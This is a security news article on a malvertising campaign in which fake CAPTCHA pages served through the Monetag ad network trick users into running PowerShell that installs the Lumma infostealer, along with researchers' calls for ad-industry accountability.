A recent malvertising campaign has been discovered by researchers, linking the distribution of the Lumma infostealer malware to a threat actor who is exploiting the Monetag ad network. This large-scale campaign targets internet users who visit websites using Monetag ad-zone scripts, particularly those searching for streaming videos, anime, sports, academic documents, and other popular content.
When users click on these websites, they are redirected to fake CAPTCHA pages that prompt them to verify their identity by completing a series of button presses. What the users don’t realize is that this action actually causes them to unknowingly execute a PowerShell script by pasting it into a Run dialog box and pressing “OK.” The malicious pages are constantly being updated with new variants to avoid detection, using different PowerShell one-liners and script obfuscation techniques.
The PowerShell scripts that are executed download and run the Lumma infostealer malware, similar to previous campaigns that have been flagged in the past. Guardio Labs researchers have been working diligently to uncover the source of this malvertising campaign, leading them to identify Monetag, a subsidiary of PropellerAds, as the ad network service responsible for distributing the malware.
The threat actor behind this campaign, known as “Vane Viper” by Infoblox researchers, is utilizing obfuscated scripts, redirect chains, and ad-tracking services to hide their malicious activities from the ad network’s moderators. The researchers estimate that up to 1 million ad impressions per day are being generated by this campaign, originating from over 3000 publisher sites.
In response to this threat, the researchers are calling for a concentrated effort to protect internet users from similar attacks in the future. They have highlighted the flawed ecosystem that allows these campaigns to thrive, including the lack of accountability among ad networks, publishers, hosting services, and ad-tracking services. The fragmented chain of ownership in the online advertising industry makes it difficult to pinpoint and enforce accountability, creating opportunities for malicious campaigns to flourish.
Guardio Labs emphasizes the need for ad networks to prioritize content moderation, account validation, and more accessible reporting mechanisms for cybersecurity professionals. They argue that relying on external reports to address abuses is not sufficient and that continuous oversight is necessary to protect all internet users from these types of threats. Ultimately, it is crucial for all parties involved in the online advertising industry to work together to prevent malvertising campaigns and keep users safe while browsing the web.